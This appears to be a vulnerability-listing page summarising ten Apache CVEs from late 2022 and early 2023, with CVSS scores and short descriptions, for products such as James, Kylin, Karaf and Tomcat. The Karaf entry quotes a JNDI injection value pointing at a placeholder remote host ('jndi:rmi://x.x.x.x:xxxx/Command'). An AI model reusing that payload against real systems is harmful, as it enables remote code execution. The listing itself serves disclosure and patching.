Vulnerabilities: Apache

DATE        CVE             VULNERABILITY TITLE
    Risk: CVSS score (severity label where given; attack vector, attack complexity; vendor, CWE where given)
    Description

2023-01-06  CVE-2022-45787  Cleartext Storage of Sensitive Information vulnerability in Apache James
    Risk: 5.5 (attack vector: local, attack complexity: low; vendor: apache; CWE-312)
    Improper, overly lax permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users.

2023-01-06  CVE-2022-45935  Unspecified vulnerability in Apache James
    Risk: 5.5 (attack vector: local, attack complexity: low; vendor: apache)
    Use of temporary files with insecure permissions by the Apache James server allows an attacker with local access to read private user data in transit.

2023-01-04  CVE-2022-45875  Unspecified vulnerability in Apache DolphinScheduler
    Risk: critical, 9.8 (attack vector: network, attack complexity: low; vendor: apache)
    Improper validation of script alert plugin parameters in Apache DolphinScheduler leads to a remote command execution vulnerability.

2023-01-03  CVE-2022-45143  Unspecified vulnerability in Apache Tomcat
    Risk: 7.5 (attack vector: network, attack complexity: low; vendor: apache)
    The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values.

2023-01-03  CVE-2021-32824  Unspecified vulnerability in Apache Dubbo
    Risk: critical, 9.8 (attack vector: network, attack complexity: low; vendor: apache)
    Apache Dubbo is a Java-based, open source RPC framework.

2022-12-30  CVE-2022-43396  Unspecified vulnerability in Apache Kylin
    Risk: 8.8 (attack vector: network, attack complexity: low; vendor: apache)
    In the fix for CVE-2022-24697, a blacklist is used to filter user input commands.

2022-12-30  CVE-2022-44621  Command Injection vulnerability in Apache Kylin
    Risk: critical, 9.8 (attack vector: network, attack complexity: low; vendor: apache; CWE-77)
    The Diagnosis Controller lacks parameter validation, so a user may be attacked by command injection via an HTTP request.

2022-12-22  CVE-2022-45347  Unspecified vulnerability in Apache ShardingSphere
    Risk: critical, 9.8 (attack vector: network, attack complexity: low; vendor: apache)
    Apache ShardingSphere-Proxy prior to 5.3.0, when using MySQL as the database backend, did not clean up the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client.

2022-12-21  CVE-2022-40145  Unspecified vulnerability in Apache Karaf
    Risk: critical, 9.8 (attack vector: network, attack complexity: low; vendor: apache)
    This vulnerability concerns a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Users are encouraged to upgrade to Apache Karaf at least 4.4.2 or 4.3.8.

2022-12-20  CVE-2022-46421  Command Injection vulnerability in Apache Apache-Airflow-Providers-Apache-Hive
    Risk: critical, 9.8 (attack vector: network, attack complexity: low; vendor: apache; CWE-77)
    Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider before 5.0.0.